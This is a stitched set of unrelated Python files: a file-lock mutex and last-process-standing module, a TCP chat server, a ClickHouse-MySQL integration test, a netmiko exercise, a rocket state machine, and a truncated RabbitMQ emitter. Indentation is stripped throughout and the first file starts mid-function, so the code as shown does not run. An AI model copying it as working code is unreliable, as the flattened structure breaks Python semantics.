with current_process_name_lock:
# Make sure all the names still exist.
# TODO: a bit O(n^2) in the number of base_dirs in flight at any one time.
collect_process_name_garbage()
if base_dir in current_process_name_for:
# If we already gave ourselves a name, return that.
return current_process_name_for[base_dir]
# We need to get a name file.
nameFD, nameFileName = tempfile.mkstemp(dir=base_dir)
# Lock the file. The lock will automatically go away if our process does.
try:
fcntl.lockf(nameFD, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError as e:
# Someone else might have locked it even though they should not have.
raise RuntimeError("Could not lock process name file {}: {}".format(nameFileName, str(e)))
# Save the basename
current_process_name_for[base_dir] = os.path.basename(nameFileName)
# Return the basename
return current_process_name_for[base_dir]
# TODO: we leave the file open forever. We might need that in order for
# it to stay locked while we are alive.
def process_name_exists(base_dir: str, name: str) -> bool:
"""
Return true if the process named by the given name (from process_name) exists, and false otherwise.
Can see across container boundaries using the given node workflow directory.
:param str base_dir: Base directory to work in. Defines the shared namespace.
:param str name: Process's name to poll
:return: True if the named process is still alive, and False otherwise.
:rtype: bool
"""
global current_process_name_lock
global current_process_name_for
with current_process_name_lock:
if current_process_name_for.get(base_dir, None) == name:
# We are asking about ourselves. We are alive.
return True
# Work out what the corresponding file name is
nameFileName = os.path.join(base_dir, name)
if not os.path.exists(nameFileName):
# If the file is gone, the process can't exist.
return False
nameFD = None
try:
# Otherwise see if we can lock it shared, for which we need an FD, but
# only for reading.
nameFD = os.open(nameFileName, os.O_RDONLY)
try:
fcntl.lockf(nameFD, fcntl.LOCK_SH | fcntl.LOCK_NB)
except OSError as e:
# Could not lock. Process is alive.
return True
else:
# Could lock. Process is dead.
# Remove the file. We race to be the first to do so.
try:
os.remove(nameFileName)
except:
pass
# Unlock
fcntl.lockf(nameFD, fcntl.LOCK_UN)
# Report process death
return False
finally:
if nameFD is not None:
try:
os.close(nameFD)
except:
pass
# Similar to the process naming system above, we define a global mutex system
# for critical sections, based just around file locks.
@contextmanager
def global_mutex(base_dir: str, mutex: str) -> Iterator[None]:
"""
Context manager that locks a mutex. The mutex is identified by the given
name, and scoped to the given directory. Works across all containers that
have access to the given diectory. Mutexes held by dead processes are
automatically released.
Only works between processes, NOT between threads.
:param str base_dir: Base directory to work in. Defines the shared namespace.
:param str mutex: Mutex to lock. Must be a permissible path component.
"""
# Define a filename
lock_filename = os.path.join(base_dir, 'toil-mutex-' + mutex)
logger.debug('PID %d acquiring mutex %s', os.getpid(), lock_filename)
# We can't just create/open and lock a file, because when we clean up
# there's a race where someone can open the file before we unlink it and
# get a lock on the deleted file.
while True:
# Try to create the file, ignoring if it exists or not.
fd = os.open(lock_filename, os.O_CREAT | os.O_WRONLY)
# Wait until we can exclusively lock it.
fcntl.lockf(fd, fcntl.LOCK_EX)
# Holding the lock, make sure we are looking at the same file on disk still.
fd_stats = os.fstat(fd)
try:
path_stats: Optional[os.stat_result] = os.stat(lock_filename)
except FileNotFoundError:
path_stats = None
if path_stats is None or fd_stats.st_dev != path_stats.st_dev or fd_stats.st_ino != path_stats.st_ino:
# The file we have a lock on is not the file linked to the name (if
# any). This usually happens, because before someone releases a
# lock, they delete the file. Go back and contend again. TODO: This
# allows a lot of queue jumping on our mutex.
fcntl.lockf(fd, fcntl.LOCK_UN)
os.close(fd)
continue
else:
# We have a lock on the file that the name points to. Since we
# hold the lock, nobody will be deleting it or can be in the
# process of deleting it. Stop contending; we have the mutex.
break
try:
# When we have it, do the thing we are protecting.
logger.debug('PID %d now holds mutex %s', os.getpid(), lock_filename)
yield
finally:
# Delete it while we still own it, so we can't delete it from out from
# under someone else who thinks they are holding it.
logger.debug('PID %d releasing mutex %s', os.getpid(), lock_filename)
os.unlink(lock_filename)
fcntl.lockf(fd, fcntl.LOCK_UN)
# Note that we are unlinking it and then unlocking it; a lot of people
# might have opened it before we unlinked it and will wake up when they
# get the worthless lock on the now-unlinked file. We have to do some
# stat gymnastics above to work around this.
os.close(fd)
class LastProcessStandingArena:
"""
Class that lets a bunch of processes detect and elect a last process
standing.
Process enter and leave (sometimes due to sudden existence failure). We
guarantee that the last process to leave, if it leaves properly, will get a
chance to do some cleanup. If new processes try to enter during the
cleanup, they will be delayed until after the cleanup has happened and the
previous "last" process has finished leaving.
The user is responsible for making sure you always leave if you enter!
Consider using a try/finally; this class is not a context manager.
"""
def __init__(self, base_dir: str, name: str) -> None:
"""
Connect to the arena specified by the given base_dir and name.
Any process that can access base_dir, in any container, can connect to
the arena. Many arenas can be active with different names.
Doesn't enter or leave the arena.
:param str base_dir: Base directory to work in. Defines the shared namespace.
:param str name: Name of the arena. Must be a permissible path component.
"""
# Save the base_dir which namespaces everything
self.base_dir = base_dir
# We need a mutex name to allow only one process to be entering or
# leaving at a time.
self.mutex = name + '-arena-lock'
# We need a way to track who is actually in, and who was in but died.
# So everybody gets a locked file (again).
# TODO: deduplicate with the similar logic for process names, and also
# deferred functions.
self.lockfileDir = os.path.join(base_dir, name + '-arena-members')
# When we enter the arena, we fill this in with the FD of the locked
# file that represents our presence.
self.lockfileFD = None
# And we fill this in with the file name
self.lockfileName = None
def enter(self) -> None:
"""
This process is entering the arena. If cleanup is in progress, blocks
until it is finished.
You may not enter the arena again before leaving it.
"""
logger.debug('Joining arena %s', self.lockfileDir)
# Make sure we're not in it already.
assert self.lockfileName is None
assert self.lockfileFD is None
with global_mutex(self.base_dir, self.mutex):
# Now nobody else should also be trying to join or leave.
try:
# Make sure the lockfile directory exists.
os.mkdir(self.lockfileDir)
except FileExistsError:
pass
# Make ourselves a file in it and lock it to prove we are alive.
self.lockfileFD, self.lockfileName = tempfile.mkstemp(dir=self.lockfileDir) # type: ignore
# Nobody can see it yet, so lock it right away
fcntl.lockf(self.lockfileFD, fcntl.LOCK_EX) # type: ignore
# Now we're properly in, so release the global mutex
logger.debug('Now in arena %s', self.lockfileDir)
def leave(self) -> Iterator[bool]:
"""
This process is leaving the arena. If this process happens to be the
last process standing, yields something, with other processes blocked
from joining the arena until the loop body completes and the process
has finished leaving. Otherwise, does not yield anything.
Should be used in a loop:
for _ in arena.leave():
# If we get here, we were the last process. Do the cleanup
pass
"""
# Make sure we're in it to start.
assert self.lockfileName is not None
assert self.lockfileFD is not None
logger.debug('Leaving arena %s', self.lockfileDir)
with global_mutex(self.base_dir, self.mutex):
# Now nobody else should also be trying to join or leave.
# Take ourselves out.
try:
os.unlink(self.lockfileName)
except:
pass
self.lockfileName = None
fcntl.lockf(self.lockfileFD, fcntl.LOCK_UN)
os.close(self.lockfileFD)
self.lockfileFD = None
for item in os.listdir(self.lockfileDir):
# There is someone claiming to be here. Are they alive?
full_path = os.path.join(self.lockfileDir, item)
fd = os.open(full_path, os.O_RDONLY)
try:
fcntl.lockf(fd, fcntl.LOCK_SH | fcntl.LOCK_NB)
except OSError as e:
# Could not lock. It's alive!
break
else:
# Could lock. Process is dead.
try:
os.remove(full_path)
except:
pass
fcntl.lockf(fd, fcntl.LOCK_UN)
# Continue with the loop normally.
else:
# Nothing alive was found. Nobody will come in while we hold
# the global mutex, so we are the Last Process Standing.
logger.debug('We are the Last Process Standing in arena %s', self.lockfileDir)
yield True
try:
# Delete the arena directory so as to leave nothing behind.
os.rmdir(self.lockfileDir)
except:
logger.warning('Could not clean up arena %s completely: %s',
self.lockfileDir, traceback.format_exc())
# Now we're done, whether we were the last one or not, and can
# release the mutex.
logger.debug('Now out of arena %s', self.lockfileDir)
|
multiChatServer.py
|
""" Script for TCP chat server - relays messages to all clients """
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
clients = {}
addresses = {}
HOST = "0.0.0.0"
PORT = 2333
BUFSIZ = 1000000
ADDR = (HOST, PORT)
SOCK = socket(AF_INET, SOCK_STREAM)
SOCK.bind(ADDR)
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SOCK.accept()
print("%s:%s has connected." % client_address)
client.send("Greetings from the ChatRoom! ".encode("utf8"))
client.send("Now type your name and press enter!".encode("utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client, client_address)).start()
def handle_client(conn, addr): # Takes client socket as argument.
"""Handles a single client connection."""
name = conn.recv(BUFSIZ).decode("utf8")
msg = "%s from [%s] has joined the chat!" % (
name, "{}:{}".format(addr[0], addr[1]))
broadcast(bytes(msg, "utf8"))
clients[conn] = name
try:
while True:
msg = conn.recv(BUFSIZ)
if msg != bytes("#quit", "utf8"):
broadcast(msg, name + ": ")
else:
conn.send(bytes("#quit", "utf8"))
conn.close()
del clients[conn]
print("[Leaving]"+str(name))
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
except:
print(str(addr) + " disconnected with exception")
conn.close()
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
print("[Broadcast]" + str(prefix) + str(msg))
sock.send(bytes(prefix, "utf8") + msg)
if __name__ == "__main__":
SOCK.listen(100) # Listens for 5 connections at max.
print("Chat Server has Started !!")
print("Waiting for connections...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start() # Starts the infinite loop.
ACCEPT_THREAD.join()
SOCK.close()
|
test.py
|
from contextlib import contextmanager
## sudo -H pip install PyMySQL
import pymysql.cursors
import pytest
import time
import threading
from helpers.cluster import ClickHouseCluster
from helpers.client import QueryRuntimeException
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1', main_configs=['configs/remote_servers.xml', 'configs/named_collections.xml'], with_mysql=True)
node2 = cluster.add_instance('node2', main_configs=['configs/remote_servers.xml'], with_mysql_cluster=True)
node3 = cluster.add_instance('node3', main_configs=['configs/remote_servers.xml'], user_configs=['configs/users.xml'], with_mysql=True)
create_table_sql_template = """
CREATE TABLE `clickhouse`.`{}` (
`id` int(11) NOT NULL,
`name` varchar(50) NOT NULL,
`age` int NOT NULL default 0,
`money` int NOT NULL default 0,
`source` enum('IP','URL') DEFAULT 'IP',
PRIMARY KEY (`id`)) ENGINE=InnoDB;
"""
drop_table_sql_template = """
DROP TABLE IF EXISTS `clickhouse`.`{}`;
"""
def get_mysql_conn(started_cluster, host):
conn = pymysql.connect(user='root', password='clickhouse', host=host, port=started_cluster.mysql_port)
return conn
def create_mysql_table(conn, tableName):
with conn.cursor() as cursor:
cursor.execute(create_table_sql_template.format(tableName))
def drop_mysql_table(conn, tableName):
with conn.cursor() as cursor:
cursor.execute(drop_table_sql_template.format(tableName))
def create_mysql_db(conn, name):
with conn.cursor() as cursor:
cursor.execute("DROP DATABASE IF EXISTS {}".format(name))
cursor.execute("CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".format(name))
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
conn = get_mysql_conn(cluster, cluster.mysql_ip)
create_mysql_db(conn, 'clickhouse')
## create mysql db and table
conn1 = get_mysql_conn(cluster, cluster.mysql2_ip)
create_mysql_db(conn1, 'clickhouse')
yield cluster
finally:
cluster.shutdown()
def test_many_connections(started_cluster):
table_name = 'test_many_connections'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse');
'''.format(table_name, table_name))
node1.query("INSERT INTO {} (id, name) SELECT number, concat('name_', toString(number)) from numbers(10) ".format(table_name))
query = "SELECT count() FROM ("
for i in range (24):
query += "SELECT id FROM {t} UNION ALL "
query += "SELECT id FROM {t})"
assert node1.query(query.format(t=table_name)) == '250\n'
drop_mysql_table(conn, table_name)
conn.close()
def test_insert_select(started_cluster):
table_name = 'test_insert_select'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse');
'''.format(table_name, table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
assert node1.query("SELECT count() FROM {}".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT sum(money) FROM {}".format(table_name)).rstrip() == '30000'
conn.close()
def test_replace_select(started_cluster):
table_name = 'test_replace_select'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse', 1);
'''.format(table_name, table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
assert node1.query("SELECT count() FROM {}".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT sum(money) FROM {}".format(table_name)).rstrip() == '30000'
conn.close()
def test_insert_on_duplicate_select(started_cluster):
table_name = 'test_insert_on_duplicate_select'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse', 0, 'update money = money + values(money)');
'''.format(table_name, table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
assert node1.query("SELECT count() FROM {}".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT sum(money) FROM {}".format(table_name)).rstrip() == '60000'
conn.close()
def test_where(started_cluster):
table_name = 'test_where'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse');
'''.format(table_name, table_name))
node1.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000) ".format(
table_name))
assert node1.query("SELECT count() FROM {} WHERE name LIKE '%name_%'".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT count() FROM {} WHERE name NOT LIKE '%tmp_%'".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT count() FROM {} WHERE money IN (1, 2, 3)".format(table_name)).rstrip() == '10000'
assert node1.query("SELECT count() FROM {} WHERE money IN (1, 2, 4, 5, 6)".format(table_name)).rstrip() == '0'
assert node1.query(
"SELECT count() FROM {} WHERE money NOT IN (1, 2, 4, 5, 6)".format(table_name)).rstrip() == '10000'
assert node1.query(
"SELECT count() FROM {} WHERE name LIKE concat('name_', toString(1))".format(table_name)).rstrip() == '1'
conn.close()
def test_table_function(started_cluster):
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, 'table_function')
create_mysql_table(conn, 'table_function')
table_function = "mysql('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse')".format('table_function')
assert node1.query("SELECT count() FROM {}".format(table_function)).rstrip() == '0'
node1.query(
"INSERT INTO {} (id, name, money) select number, concat('name_', toString(number)), 3 from numbers(10000)".format(
'TABLE FUNCTION ' + table_function))
assert node1.query("SELECT count() FROM {}".format(table_function)).rstrip() == '10000'
assert node1.query("SELECT sum(c) FROM ("
"SELECT count() as c FROM {} WHERE id % 3 == 0"
" UNION ALL SELECT count() as c FROM {} WHERE id % 3 == 1"
" UNION ALL SELECT count() as c FROM {} WHERE id % 3 == 2)".format(table_function,
table_function,
table_function)).rstrip() == '10000'
assert node1.query("SELECT sum(`money`) FROM {}".format(table_function)).rstrip() == '30000'
node1.query("INSERT INTO {} (id, name, age, money) SELECT id + 100000, name, age, money FROM {}".format(
'TABLE FUNCTION ' + table_function, table_function))
assert node1.query("SELECT sum(`money`) FROM {}".format(table_function)).rstrip() == '60000'
conn.close()
def test_binary_type(started_cluster):
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, 'binary_type')
with conn.cursor() as cursor:
cursor.execute("CREATE TABLE clickhouse.binary_type (id INT PRIMARY KEY, data BINARY(16) NOT NULL)")
table_function = "mysql('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse')".format('binary_type')
node1.query("INSERT INTO {} VALUES (42, 'clickhouse')".format('TABLE FUNCTION ' + table_function))
assert node1.query("SELECT * FROM {}".format(table_function)) == '42\tclickhouse\\0\\0\\0\\0\\0\\0\n'
def test_enum_type(started_cluster):
table_name = 'test_enum_type'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32, source Enum8('IP' = 1, 'URL' = 2)) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse', 1);
'''.format(table_name, table_name))
node1.query("INSERT INTO {} (id, name, age, money, source) VALUES (1, 'name', 0, 0, 'URL')".format(table_name))
assert node1.query("SELECT source FROM {} LIMIT 1".format(table_name)).rstrip() == 'URL'
conn.close()
def test_mysql_distributed(started_cluster):
table_name = 'test_replicas'
conn1 = get_mysql_conn(started_cluster, started_cluster.mysql_ip)
conn2 = get_mysql_conn(started_cluster, started_cluster.mysql2_ip)
conn3 = get_mysql_conn(started_cluster, started_cluster.mysql3_ip)
conn4 = get_mysql_conn(started_cluster, started_cluster.mysql4_ip)
create_mysql_db(conn1, 'clickhouse')
create_mysql_db(conn2, 'clickhouse')
create_mysql_db(conn3, 'clickhouse')
create_mysql_db(conn4, 'clickhouse')
create_mysql_table(conn1, table_name)
create_mysql_table(conn2, table_name)
create_mysql_table(conn3, table_name)
create_mysql_table(conn4, table_name)
node2.query('DROP TABLE IF EXISTS test_replicas')
# Storage with with 3 replicas
node2.query('''
CREATE TABLE test_replicas
(id UInt32, name String, age UInt32, money UInt32)
ENGINE = MySQL('mysql{2|3|4}:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse'); ''')
# Fill remote tables with different data to be able to check
nodes = [node1, node2, node2, node2]
for i in range(1, 5):
nodes[i-1].query('DROP TABLE IF EXISTS test_replica{}'.format(i))
nodes[i-1].query('''
CREATE TABLE test_replica{}
(id UInt32, name String, age UInt32, money UInt32)
ENGINE = MySQL('mysql{}:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse');'''.format(i, 57 if i==1 else i))
nodes[i-1].query("INSERT INTO test_replica{} (id, name) SELECT number, 'host{}' from numbers(10) ".format(i, i))
# test multiple ports parsing
result = node2.query('''SELECT DISTINCT(name) FROM mysql('mysql{57|2|3}:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse'); ''')
assert(result == 'host1\n' or result == 'host2\n' or result == 'host3\n')
result = node2.query('''SELECT DISTINCT(name) FROM mysql('mysql57:3306|mysql2:3306|mysql3:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse'); ''')
assert(result == 'host1\n' or result == 'host2\n' or result == 'host3\n')
# check all replicas are traversed
query = "SELECT * FROM ("
for i in range (3):
query += "SELECT name FROM test_replicas UNION DISTINCT "
query += "SELECT name FROM test_replicas)"
result = node2.query(query)
assert(result == 'host2\nhost3\nhost4\n')
# Storage with with two shards, each has 2 replicas
node2.query('DROP TABLE IF EXISTS test_shards')
node2.query('''
CREATE TABLE test_shards
(id UInt32, name String, age UInt32, money UInt32)
ENGINE = ExternalDistributed('MySQL', 'mysql{57|2}:3306,mysql{3|4}:3306', 'clickhouse', 'test_replicas', 'root', 'clickhouse'); ''')
# Check only one replica in each shard is used
result = node2.query("SELECT DISTINCT(name) FROM test_shards ORDER BY name")
assert(result == 'host1\nhost3\n')
# check all replicas are traversed
query = "SELECT name FROM ("
for i in range (3):
query += "SELECT name FROM test_shards UNION DISTINCT "
query += "SELECT name FROM test_shards) ORDER BY name"
result = node2.query(query)
assert(result == 'host1\nhost2\nhost3\nhost4\n')
# disconnect mysql57
started_cluster.pause_container('mysql57')
result = node2.query("SELECT DISTINCT(name) FROM test_shards ORDER BY name")
started_cluster.unpause_container('mysql57')
assert(result == 'host2\nhost4\n' or result == 'host3\nhost4\n')
def test_external_settings(started_cluster):
table_name = 'test_external_settings'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, started_cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node3.query(f'DROP TABLE IF EXISTS {table_name}')
node3.query('''
CREATE TABLE {}(id UInt32, name String, age UInt32, money UInt32) ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse');
'''.format(table_name, table_name))
node3.query(
"INSERT INTO {}(id, name, money) select number, concat('name_', toString(number)), 3 from numbers(100) ".format(
table_name))
assert node3.query("SELECT count() FROM {}".format(table_name)).rstrip() == '100'
assert node3.query("SELECT sum(money) FROM {}".format(table_name)).rstrip() == '300'
node3.query("select value from system.settings where name = 'max_block_size' FORMAT TSV") == "2\n"
node3.query("select value from system.settings where name = 'external_storage_max_read_rows' FORMAT TSV") == "0\n"
assert node3.query("SELECT COUNT(DISTINCT blockNumber()) FROM {} FORMAT TSV".format(table_name)) == '50\n'
conn.close()
def test_settings_connection_wait_timeout(started_cluster):
table_name = 'test_settings_connection_wait_timeout'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
wait_timeout = 2
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}
(
id UInt32,
name String,
age UInt32,
money UInt32
)
ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse')
SETTINGS connection_wait_timeout={}, connection_pool_size=1
'''.format(table_name, table_name, wait_timeout)
)
node1.query("INSERT INTO {} (id, name) SELECT number, concat('name_', toString(number)) from numbers(10) ".format(table_name))
def worker():
node1.query("SELECT sleepEachRow(1) FROM {}".format(table_name))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
# ensure that first query started in worker_thread
time.sleep(1)
started = time.time()
with pytest.raises(QueryRuntimeException, match=r"Exception: mysqlxx::Pool is full \(connection_wait_timeout is exceeded\)"):
node1.query("SELECT sleepEachRow(1) FROM {}".format(table_name))
ended = time.time()
assert (ended - started) >= wait_timeout
worker_thread.join()
drop_mysql_table(conn, table_name)
conn.close()
def test_predefined_connection_configuration(started_cluster):
conn = get_mysql_conn(started_cluster, started_cluster.mysql_ip)
table_name = 'test_table'
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql1);
''')
node1.query("INSERT INTO test_table (id, name, money) select number, toString(number), number from numbers(100)")
assert (node1.query(f"SELECT count() FROM test_table").rstrip() == '100')
node1.query('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql1, replace_query=1);
''')
node1.query("INSERT INTO test_table (id, name, money) select number, toString(number), number from numbers(100)")
node1.query("INSERT INTO test_table (id, name, money) select number, toString(number), number from numbers(100)")
assert (node1.query(f"SELECT count() FROM test_table").rstrip() == '100')
node1.query_and_get_error('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql1, query=1);
''')
node1.query_and_get_error('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql1, replace_query=1, on_duplicate_clause='kek');
''')
node1.query_and_get_error('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(fff);
''')
node1.query_and_get_error('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql2);
''')
node1.query('''
DROP TABLE IF EXISTS test_table;
CREATE TABLE test_table (id UInt32, name String, age UInt32, money UInt32)
ENGINE MySQL(mysql3, port=3306);
''')
assert (node1.query(f"SELECT count() FROM test_table").rstrip() == '100')
# Regression for (k, v) IN ((k, v))
def test_mysql_in(started_cluster):
table_name = 'test_mysql_in'
node1.query(f'DROP TABLE IF EXISTS {table_name}')
conn = get_mysql_conn(started_cluster, cluster.mysql_ip)
drop_mysql_table(conn, table_name)
create_mysql_table(conn, table_name)
node1.query('''
CREATE TABLE {}
(
id UInt32,
name String,
age UInt32,
money UInt32
)
ENGINE = MySQL('mysql57:3306', 'clickhouse', '{}', 'root', 'clickhouse')
'''.format(table_name, table_name)
)
node1.query("INSERT INTO {} (id, name) SELECT number, concat('name_', toString(number)) from numbers(10) ".format(table_name))
node1.query("SELECT * FROM {} WHERE (id) IN (1)".format(table_name))
node1.query("SELECT * FROM {} WHERE (id) IN (1, 2)".format(table_name))
node1.query("SELECT * FROM {} WHERE (id, name) IN ((1, 'name_1'))".format(table_name))
node1.query("SELECT * FROM {} WHERE (id, name) IN ((1, 'name_1'),(1, 'name_1'))".format(table_name))
drop_mysql_table(conn, table_name)
conn.close()
if __name__ == '__main__':
with contextmanager(started_cluster)() as cluster:
for name, instance in list(cluster.instances.items()):
print(name, instance.ip_address)
input("Cluster created, press any key to destroy...")
|
exercise7.py
|
#!/usr/bin/env python
"""
Exercise 7. Repeat exercise #6 except use processes.
"""
import time
from multiprocessing import Process, current_process
from netmiko import ConnectHandler
from net_system.models import NetworkDevice
import django
def show_version(device):
"""
Function to get output of 'show version'.
"""
remote_connection = ConnectHandler(device_type=device.device_type,
ip=device.ip_address, port=device.port,
username=device.credentials.username,
password=device.credentials.password)
print '=' * 50
print device.device_name
print '-' * 15
print remote_connection.send_command_expect('show version')
def main():
"""
The main function
"""
django.setup()
device_list = NetworkDevice.objects.all()
starttime = time.time()
procs_list = []
for device in device_list:
device_proc = Process(target=show_version, args=(device,))
device_proc.start()
procs_list.append(device_proc)
for a_proc in procs_list:
print a_proc
a_proc.join()
finishtime = time.time()
total_elapsed_time = finishtime - starttime
print '*' * 50
print 'Overall retrieval time: %.2f seconds' % round(total_elapsed_time, 2)
print '*' * 50
if __name__ == '__main__':
main()
|
State.py
|
"""
State.py
========
Perform actions of the rocket and manage state.
`hooks` is a dictionary mapping a hook string to a
list of functions to thread when the hook occurs.
"""
import datetime
from os import system
from threading import Thread
class State:
def __init__(self, conf, data, hooks={}):
self.hooks = hooks
self.conf = conf
self.data = data
# Map of state to function
self.actions = {
"HALT": self.halt, # Rocket should not do anything
"ARM": self.arm, # Rocket is ready to begin state system
"UPWARD": self.upward, # Rocket is going up
"APOGEE": self.apogee, # Rocket is at apogee
"DOWNWARD": self.downward, # rocket is going down
"EJECT": self.eject, # rocket is at main ejection altitude
"RECOVER": self.recover, # rocket is in recovery state
"SHUTDOWN": self.shutdown,
"RESTART": self.restart,
}
self.activate_hook("halt_start")
def act(self) -> str:
"""
Use the correct method for the correct state.
"""
self.conf.last_state = self.conf.state # Update last state
self.conf.state = self.actions[self.conf.state]() # Perform action
return self.conf.state # Return current state
def activate_hook(self, hook_name : str) -> None:
"""
Activate a hook function.
"""
print(f"Activating hook '{hook_name}'")
for function in self.hooks.get(hook_name, []):
t = Thread(target=function, args=(self.conf,self.data))
t.start()
def halt(self) -> str:
"""Do nothing. A halted rocket shouldn't do anything."""
return "HALT"
def arm(self) -> str:
"""
Wait for launch.
System is going up if it is 100 meters in the air and 8/10 of the last
dp readings are negative.
"""
# Detect if system starts to go up
distance_above_ground = self.data.to_dict()["sensors"]["alt"]
if self.data.check_dp_lt_val(0) and distance_above_ground > 100:
self.activate_hook("arm_end")
self.activate_hook("upward_start")
return "UPWARD"
return "ARM"
def upward(self):
"""Change state to Use air-stoppers if necessary."""
if self.data.check_dp_gt_val(0):
self.activate_hook("upward_end")
self.activate_hook("apogee_start")
return "APOGEE"
return "UPWARD"
def apogee(self):
"""Eject parachute."""
self.activate_hook("apogee_end")
self.activate_hook("downward_start")
return "DOWNWARD"
def downward(self):
"""Wait until correct altitude."""
if self.data.to_dict()["sensors"]["alt"] < self.conf.MAIN_ALTITUDE:
self.activate_hook("wait_end")
self.activate_hook("eject_start")
return "EJECT"
return "DOWNWARD"
def eject(self):
"""Eject other parachute."""
self.activate_hook("eject_end")
self.activate_hook("recover_start")
return "RECOVER"
def recover(self):
"""Do nothing."""
return "RECOVER"
def restart(self):
"""Restart the system."""
system('reboot now')
def shutdown(self):
"""Shutdown the system."""
system("shutdown -s")
def __str__(self):
return str(self.conf.state)
def __repr__(self):
return str(self)
|
AlertEvent.py
|
import pika
import json
import os
import logging
import time
from threading import Thread
def emit_alert_event(type, data):
def emitter():
try:
time.sleep(2)
rabbit_credentials = pika.PlainCredentials(os.environ.get("RABBITMQ_DEFAULT_USER"), os.environ.get("RABBITMQ_DEFAULT_PASS"))
connection = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ.get("RABBITMQ_HOST"), port=os.environ.get("RABBITMQ_PORT"), credentials=rabbit_credentials))
channel = connection.channel()
